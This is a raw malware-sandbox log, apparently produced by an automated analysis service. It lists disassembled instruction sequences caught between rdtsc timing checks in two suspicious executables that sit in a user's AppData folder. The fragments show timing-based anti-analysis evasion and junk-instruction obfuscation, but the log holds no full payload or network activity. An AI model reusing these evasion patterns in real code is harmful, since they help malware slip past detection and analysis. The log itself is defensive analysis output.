Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56F2B8 second address: 56F2D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738B89E0Ch 0x00000009 popad 0x0000000a pushad 0x0000000b jne 00007F2738B89E06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56F2D2 second address: 56F2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jo 00007F2738E98EE6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56F2E2 second address: 56F2E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56F2E8 second address: 56F2EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56FD3A second address: 56FD52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E14h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56FD52 second address: 56FD56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 56FD56 second address: 56FD66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F2738B89E0Eh 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ACFDB second address: 5ACFE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ACFE0 second address: 5ACFE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ACFE6 second address: 5ACFF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ACFF2 second address: 5ACFF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ACFF8 second address: 5ACFFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 5ABF50 second address: 5ABF68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F2738B89E0Ch 0x0000000b popad 0x0000000c push ebx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20218 second address: 4A20255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2738E98EEFh 0x00000009 sub esi, 064D379Eh 0x0000000f jmp 00007F2738E98EF9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20255 second address: 4A2025B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A2025B second address: 4A202FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], edi 0x0000000c jmp 00007F2738E98EF0h 0x00000011 test esi, esi 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F2738E98EEEh 0x0000001a adc ecx, 5C9EE328h 0x00000020 jmp 00007F2738E98EEBh 0x00000025 popfd 0x00000026 mov ebx, eax 0x00000028 popad 0x00000029 je 00007F27AB827254h 0x0000002f jmp 00007F2738E98EF2h 0x00000034 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000003b jmp 00007F2738E98EF0h 0x00000040 je 00007F27AB82723Bh 0x00000046 pushad 0x00000047 push eax 0x00000048 push edx 0x00000049 pushfd 0x0000004a jmp 00007F2738E98EECh 0x0000004f and ah, FFFFFFE8h 0x00000052 jmp 00007F2738E98EEBh 0x00000057 popfd 0x00000058 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A202FB second address: 4A203AD instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2738B89E18h 0x00000008 or cl, 00000048h 0x0000000b jmp 00007F2738B89E0Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 movzx ecx, dx 0x00000016 popad 0x00000017 mov edx, dword ptr [esi+44h] 0x0000001a jmp 00007F2738B89E0Bh 0x0000001f or edx, dword ptr [ebp+0Ch] 0x00000022 pushad 0x00000023 push esi 0x00000024 mov eax, edi 0x00000026 pop edx 0x00000027 pushfd 0x00000028 jmp 00007F2738B89E0Ch 0x0000002d sbb ch, FFFFFFD8h 0x00000030 jmp 00007F2738B89E0Bh 0x00000035 popfd 0x00000036 popad 0x00000037 test edx, 61000000h 0x0000003d jmp 00007F2738B89E16h 0x00000042 jne 00007F27AB518114h 0x00000048 jmp 00007F2738B89E10h 0x0000004d test byte ptr [esi+48h], 00000001h 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F2738B89E17h 0x00000058 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A203AD second address: 4A203B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A203B3 second address: 4A203D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F27AB5180E3h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A203D0 second address: 4A203D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A203D4 second address: 4A203EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A107FC second address: 4A10862 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c pushfd 0x0000000d jmp 00007F2738E98EF3h 0x00000012 jmp 00007F2738E98EF3h 0x00000017 popfd 0x00000018 pop ecx 0x00000019 pushad 0x0000001a mov dl, EFh 0x0000001c push eax 0x0000001d pop ebx 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F2738E98EEDh 0x00000026 xchg eax, ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F2738E98EEDh 0x0000002e rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10862 second address: 4A10934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007F2738B89E0Ch 0x00000011 movzx ecx, di 0x00000014 pop edx 0x00000015 jmp 00007F2738B89E0Ch 0x0000001a popad 0x0000001b and esp, FFFFFFF8h 0x0000001e jmp 00007F2738B89E10h 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 call 00007F2738B89E0Eh 0x0000002a jmp 00007F2738B89E12h 0x0000002f pop ecx 0x00000030 pushfd 0x00000031 jmp 00007F2738B89E0Bh 0x00000036 jmp 00007F2738B89E13h 0x0000003b popfd 0x0000003c popad 0x0000003d push eax 0x0000003e jmp 00007F2738B89E19h 0x00000043 xchg eax, ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 mov si, di 0x0000004a pushfd 0x0000004b jmp 00007F2738B89E0Fh 0x00000050 jmp 00007F2738B89E13h 0x00000055 popfd 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10934 second address: 4A1098A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F2738E98EEEh 0x0000000f push eax 0x00000010 jmp 00007F2738E98EEBh 0x00000015 xchg eax, esi 0x00000016 pushad 0x00000017 mov cl, 42h 0x00000019 push eax 0x0000001a push edx 0x0000001b call 00007F2738E98EF7h 0x00000020 pop eax 0x00000021 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A1098A second address: 4A10996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov esi, dword ptr [ebp+08h] 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10996 second address: 4A109EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2738E98EECh 0x00000009 popad 0x0000000a jmp 00007F2738E98EF2h 0x0000000f popad 0x00000010 sub ebx, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov cx, D819h 0x00000019 pushfd 0x0000001a jmp 00007F2738E98EF6h 0x0000001f sbb si, ADA8h 0x00000024 jmp 00007F2738E98EEBh 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A109EC second address: 4A10AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E19h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b jmp 00007F2738B89E0Eh 0x00000010 je 00007F27AB51F77Bh 0x00000016 jmp 00007F2738B89E10h 0x0000001b cmp dword ptr [esi+08h], DDEEDDEEh 0x00000022 jmp 00007F2738B89E10h 0x00000027 mov ecx, esi 0x00000029 pushad 0x0000002a mov edx, ecx 0x0000002c call 00007F2738B89E0Ah 0x00000031 push esi 0x00000032 pop ebx 0x00000033 pop eax 0x00000034 popad 0x00000035 je 00007F27AB51F750h 0x0000003b jmp 00007F2738B89E0Dh 0x00000040 test byte ptr [77436968h], 00000002h 0x00000047 jmp 00007F2738B89E0Eh 0x0000004c jne 00007F27AB51F73Bh 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F2738B89E17h 0x00000059 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10AA0 second address: 4A10B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 jmp 00007F2738E98EEBh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edx, dword ptr [ebp+0Ch] 0x00000010 pushad 0x00000011 mov di, cx 0x00000014 mov edx, ecx 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 pushad 0x00000019 call 00007F2738E98EF8h 0x0000001e mov dx, cx 0x00000021 pop eax 0x00000022 call 00007F2738E98EF7h 0x00000027 pushfd 0x00000028 jmp 00007F2738E98EF8h 0x0000002d and cl, FFFFFFA8h 0x00000030 jmp 00007F2738E98EEBh 0x00000035 popfd 0x00000036 pop eax 0x00000037 popad 0x00000038 push eax 0x00000039 jmp 00007F2738E98EF6h 0x0000003e xchg eax, ebx 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F2738E98EEDh 0x00000046 sbb cx, 3B76h 0x0000004b jmp 00007F2738E98EF1h 0x00000050 popfd 0x00000051 popad 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 mov edx, esi 0x00000056 mov dl, ch 0x00000058 popad 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F2738E98EF1h 0x00000061 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10B76 second address: 4A10BB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, AA99h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F2738B89E11h 0x00000014 sub eax, 4C5BB0E6h 0x0000001a jmp 00007F2738B89E11h 0x0000001f popfd 0x00000020 movzx eax, bx 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10BF8 second address: 4A10C19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2738E98EEDh 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A10C19 second address: 4A10C64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b mov ecx, 3F2D7D43h 0x00000010 call 00007F2738B89E18h 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov esp, ebp 0x00000019 jmp 00007F2738B89E0Dh 0x0000001e pop ebp 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20DDA second address: 4A20E00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d mov ecx, 1F6336E9h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20E00 second address: 4A20E04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20E04 second address: 4A20E5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov cx, B42Bh 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov bx, D8D2h 0x00000011 pushfd 0x00000012 jmp 00007F2738E98EF3h 0x00000017 jmp 00007F2738E98EF3h 0x0000001c popfd 0x0000001d popad 0x0000001e xchg eax, ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov eax, ebx 0x00000024 jmp 00007F2738E98EF7h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20B46 second address: 4A20B4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20B4A second address: 4A20B4E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20B4E second address: 4A20B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20B54 second address: 4A20BEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007F2738E98EF4h 0x00000010 pushfd 0x00000011 jmp 00007F2738E98EF2h 0x00000016 add eax, 421F5A88h 0x0000001c jmp 00007F2738E98EEBh 0x00000021 popfd 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007F2738E98EF9h 0x00000029 xchg eax, ebp 0x0000002a jmp 00007F2738E98EEEh 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F2738E98EF7h 0x00000038 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20BEB second address: 4A20C25 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F2738B89E0Bh 0x0000000b or ecx, 5C25318Eh 0x00000011 jmp 00007F2738B89E19h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20C25 second address: 4A20C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20C2C second address: 4A20C41 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738B89E11h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A20C41 second address: 4A20C45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4AA068E second address: 4AA0694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4AA0694 second address: 4AA0698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A909B4 second address: 4A90A07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738B89E0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dl, ah 0x0000000d pushfd 0x0000000e jmp 00007F2738B89E19h 0x00000013 jmp 00007F2738B89E0Bh 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F2738B89E14h 0x00000022 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A07 second address: 4A90A34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F2738E98EF6h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A34 second address: 4A90A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A3C second address: 4A90A41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A41 second address: 4A90A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A47 second address: 4A90A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A55 second address: 4A90A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90A59 second address: 4A90A5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A907EB second address: 4A9083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2738B89E0Fh 0x00000009 add si, 8A3Eh 0x0000000e jmp 00007F2738B89E19h 0x00000013 popfd 0x00000014 mov cx, 9187h 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c pushad 0x0000001d mov dx, FF9Eh 0x00000021 mov ah, dh 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007F2738B89E0Dh 0x0000002c rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A9083D second address: 4A90843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90843 second address: 4A90847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90847 second address: 4A90875 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F2738E98EEFh 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F2738E98EF0h 0x00000019 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90875 second address: 4A9087B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A9087B second address: 4A9088C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2738E98EEDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A30213 second address: 4A30219 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 247239 second address: 24723E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90C4D second address: 4A90CAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop esi 0x00000005 jmp 00007F2738B89E13h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov bx, ax 0x00000012 mov di, cx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F2738B89E0Ah 0x0000001d push dword ptr [ebp+0Ch] 0x00000020 jmp 00007F2738B89E10h 0x00000025 push dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F2738B89E17h 0x0000002f rdtsc
Source: C:\Users\user\AppData\RoamingBKJEGDGIJE.exe RDTSC instruction interceptor: First address: 4A90CAC second address: 4A90CF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2738E98EF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 8B600F41h 0x0000000e jmp 00007F2738E98EF7h 0x00000013 add dword ptr [esp], 74A0F0C1h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov al, dh 0x0000001f mov ax, 3B23h 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 246372 second address: 246381 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F2738B89E06h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 24651F second address: 246523 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 246523 second address: 246547 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2738B89E06h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007F2738B89E17h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 246AA2 second address: 246AA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 246AA6 second address: 246AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingIJEGDBGDBF.exe RDTSC instruction interceptor: First address: 249937 second address: 24993B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
